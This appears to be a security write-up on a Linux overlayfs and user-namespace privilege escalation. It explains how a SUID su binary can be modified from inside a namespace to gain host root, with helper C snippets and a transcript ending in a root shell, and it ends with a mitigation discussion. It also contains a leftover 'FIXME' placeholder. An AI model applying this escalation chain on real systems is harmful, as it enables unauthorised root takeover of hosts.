Problem description:

Linux user namespaces allow a normal user to mount file systems, including overlayfs. As many of these features were not designed with namespaces in mind, this increases the attack surface of the Linux kernel interface. Due to missing security checks when changing the mode of files on overlayfs, a SUID binary can be created within a user namespace but executed from outside to gain root privileges.

Overlayfs was intended to allow the creation of writable filesystems when running from read-only media, e.g. a live CD. In such a scenario, the lower filesystem contains the read-only data from the medium, and the upper filesystem is merged on top of it. The merged view is then presented as an overlayfs at a given mount point. Writes to this overlayfs only modify data in the upper filesystem, which may reside on a tmpfs for that purpose.
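The lower/upper layering described above can be sketched with mount(2). This is a minimal illustration only: it assumes the mainline "overlay" filesystem type, which needs an additional empty workdir on the same filesystem as the upper directory. Older distribution kernels registered the driver under a different name. The function names are hypothetical and not taken from the example code referenced in this article.

```c
#include <errno.h>
#include <stdio.h>
#include <sys/mount.h>

/* Build the option string "lowerdir=...,upperdir=...,workdir=...".
 * Returns 0 on success, -1 if the buffer is too small. */
int build_overlay_options(char *buf, size_t len, const char *lower,
                          const char *upper, const char *work)
{
    int n = snprintf(buf, len, "lowerdir=%s,upperdir=%s,workdir=%s",
                     lower, upper, work);
    return (n < 0 || (size_t)n >= len) ? -1 : 0;
}

/* Mount the merged view at target. Returns 0 on success, -1 with errno
 * set otherwise, e.g. EPERM when the caller lacks CAP_SYS_ADMIN in the
 * namespace that owns the mount namespace. */
int mount_overlay(const char *target, const char *lower,
                  const char *upper, const char *work)
{
    char opts[4096];

    if (build_overlay_options(opts, sizeof(opts), lower, upper, work) != 0) {
        errno = ENAMETOOLONG;
        return -1;
    }
    /* Assumption: mainline filesystem type name "overlay". */
    return mount("overlay", target, "overlay", 0, opts);
}
```

A call such as mount_overlay("/mnt/merged", "/media/cdrom", "/tmp/upper", "/tmp/work") would then present the read-only medium as writable at /mnt/merged, with all changes stored below /tmp/upper. The paths are placeholders.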

One problematic use case is the modification of files or file attributes on the overlayfs within a user namespace. A user without any capabilities on the host is given CAP_SYS_ADMIN within the user namespace. Overlayfs therefore permits attribute changes on its files unless it also checks whether the host-system user, who lacks CAP_SYS_ADMIN on the host, would be allowed to change the attributes of the underlying file. As this check was missing, a process within the namespace could gain read/write access to arbitrary files. Combined with the SUID-write technique from a previous article (SetgidDirectoryPrivilegeEscalation), modification of host-UID-0 SUID binaries allows escalation to the host root user.
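How an unprivileged user ends up with capabilities inside a namespace can be sketched as follows. This is an illustration under assumptions, not the code from the referenced exploit: the process maps its own ids from inside the namespace, whereas the program output further below suggests the original lets the parent write the maps via /proc/PID/uid_map. The helper names are hypothetical. unshare(2) is invoked through syscall(2) so that the sketch does not depend on _GNU_SOURCE being defined before the first include.

```c
#include <fcntl.h>
#include <linux/sched.h>   /* CLONE_NEWUSER, CLONE_NEWNS */
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Format one uid_map/gid_map line "<id inside> <id outside> 1\n".
 * Returns the line length, or -1 if the buffer is too small. */
int format_id_map(char *buf, size_t len, unsigned inside, unsigned outside)
{
    int n = snprintf(buf, len, "%u %u 1\n", inside, outside);
    return (n < 0 || (size_t)n >= len) ? -1 : n;
}

/* Write a string to an existing file. Returns 0 on success. */
static int write_file(const char *path, const char *data)
{
    ssize_t len = (ssize_t)strlen(data);
    int fd = open(path, O_WRONLY);
    if (fd < 0)
        return -1;
    ssize_t written = write(fd, data, (size_t)len);
    close(fd);
    return written == len ? 0 : -1;
}

/* Enter new user and mount namespaces and map the caller to uid/gid 0
 * inside. Afterwards the process holds all capabilities, including
 * CAP_SYS_ADMIN, but only relative to the new user namespace. */
int enter_userns_as_root(void)
{
    char map[64];
    unsigned uid = (unsigned)getuid();
    unsigned gid = (unsigned)getgid();

    if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNS) != 0)
        return -1;
    /* Kernels since 3.19 require this before gid_map may be written by
     * an unprivileged process; the file is absent on older kernels, so
     * a failure here is ignored. */
    (void)write_file("/proc/self/setgroups", "deny");
    if (format_id_map(map, sizeof(map), 0, uid) < 0 ||
        write_file("/proc/self/uid_map", map) != 0)
        return -1;
    if (format_id_map(map, sizeof(map), 0, gid) < 0 ||
        write_file("/proc/self/gid_map", map) != 0)
        return -1;
    return 0;
}
```

After a successful call, geteuid() reports 0 inside the namespace while the process still runs with its original uid as seen from the host. Any kernel code path that only checks the namespace-local capability therefore trusts a user who has no privileges on the host.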


Exploitation Technique:

Exploitation is technically quite simple:


This exploit uses one parent process and one user namespace process. The namespace process creates the overlayfs mount, chdirs to the directory and makes su writable. Afterwards it waits until the parent has gained root privileges before rolling everything back: unmounting and cleaning up helper files. As soon as the parent process notices that the child has prepared su as intended, it uses the technique from SetgidDirectoryPrivilegeEscalation: it calls another SUID binary, e.g. mount, and uses that binary's stderr to write to the opened su file without losing the SUID bit. Afterwards the parent process invokes the modified su to create a UID 0 process. The change of the parent's UID then triggers the namespace child to start cleanup. See UserNamespaceOverlayfsSetuidWriteExec.c for example code.

build# ./UserNamespaceOverlayfsSetuidWriteExec -- /bin/bash
Setting uid map in /proc/491/uid_map
Setting gid map in /proc/491/gid_map
euid: 0, egid: 0
euid: 0, egid: 0
Namespace helper waiting for modification completion
Namespace part completed
root#
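The detour via another SUID binary is needed because the kernel strips the SUID bit when a process without CAP_FSETID writes to a file. The following harmless sketch makes that behaviour observable on a throwaway file owned by the caller. The function name and the scratch path are hypothetical and not part of the referenced example code.

```c
#include <fcntl.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create a scratch file, set its SUID bit, write one byte to it and
 * check the mode afterwards.
 * Returns 1 if the write cleared the SUID bit, 0 if the bit survived
 * (expected when running with CAP_FSETID, e.g. as root), -1 on error. */
int suid_cleared_by_write(void)
{
    char path[] = "/tmp/suid-demo-XXXXXX";  /* hypothetical scratch file */
    struct stat st;
    int result = -1;

    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    if (fchmod(fd, 04755) == 0 &&       /* owner sets SUID on own file */
        write(fd, "x", 1) == 1 &&       /* ordinary write to the file */
        fstat(fd, &st) == 0)
        result = (st.st_mode & S_ISUID) ? 0 : 1;
    close(fd);
    unlink(path);
    return result;
}
```

Run as a normal user, the function is expected to return 1. A write issued by a process that holds CAP_FSETID keeps the bit, which is why the write has to be performed by a privileged SUID helper.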

Results, Discussion

The missing security checks in overlayfs were a mistake that should not have happened, but one that would not have had such devastating effects by itself. Exposing a considerable amount of kernel functionality to unprivileged users via user namespaces increases the attack surface of the kernel significantly. Thus it might be a good idea to deactivate user namespaces on standard kernels by default and grant them only to selected users.
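Whether a given system exposes user namespaces to unprivileged users can be checked roughly as sketched below. The two sysctl files are assumptions that do not appear in the original text: kernel.unprivileged_userns_clone is provided by a Debian/Ubuntu kernel patch, and user.max_user_namespaces exists in mainline kernels since 4.9. Both are system-wide switches, so they do not provide the per-user granting suggested above. The function names are hypothetical.

```c
#include <stdio.h>

/* Read a single integer from a sysctl-style file.
 * Returns 0 on success, -1 if the file is missing or unparsable. */
int read_long_from_file(const char *path, long *value)
{
    FILE *f = fopen(path, "r");
    if (f == NULL)
        return -1;
    int ok = (fscanf(f, "%ld", value) == 1);
    fclose(f);
    return ok ? 0 : -1;
}

/* Returns 1 if unprivileged user namespaces appear to be enabled,
 * 0 if they appear disabled, -1 if neither knob is present. */
int unprivileged_userns_enabled(void)
{
    long v;

    /* Distribution-specific switch (assumption: Debian/Ubuntu patch). */
    if (read_long_from_file("/proc/sys/kernel/unprivileged_userns_clone",
                            &v) == 0 && v == 0)
        return 0;
    /* Mainline limit; a value of 0 forbids creating user namespaces. */
    if (read_long_from_file("/proc/sys/user/max_user_namespaces", &v) == 0)
        return v > 0 ? 1 : 0;
    return -1;
}
```

A result of -1 only means that this sketch could not find either file, not that the feature is absent.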

For the above exploit to work, exposure within the namespace is not sufficient: a process from outside also uses /proc to access the mounts, which should be visible only to processes within the namespace. This is already a risk by itself and might also be a security vulnerability worth fixing. Mixing content from within namespaces and processes outside the namespace was also used for FIXME.
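The access from outside can be pictured as a path lookup through the /proc entry of the namespace process. The sketch below assumes that the working directory link /proc/PID/cwd is used, which fits the description that the namespace process chdirs into the mount. The exact path used by the example code is not stated here, and the function names are hypothetical.

```c
#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>

/* Build "/proc/<pid>/cwd/<name>".
 * Returns 0 on success, -1 if the buffer is too small. */
int proc_cwd_path(char *buf, size_t len, pid_t pid, const char *name)
{
    int n = snprintf(buf, len, "/proc/%ld/cwd/%s", (long)pid, name);
    return (n < 0 || (size_t)n >= len) ? -1 : 0;
}

/* Open a file relative to the working directory of another process.
 * The kernel resolves the cwd link in the mount namespace of that
 * process, so mounts invisible to the caller become reachable.
 * Returns a file descriptor, or -1 on error. */
int open_via_proc_cwd(pid_t pid, const char *name, int flags)
{
    char path[4096];

    if (proc_cwd_path(path, sizeof(path), pid, name) != 0)
        return -1;
    return open(path, flags);
}
```

Access to the link is subject to the usual /proc permission checks, which a parent running under the same host uid as its namespace child passes.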


Material, References

Last modified 20171228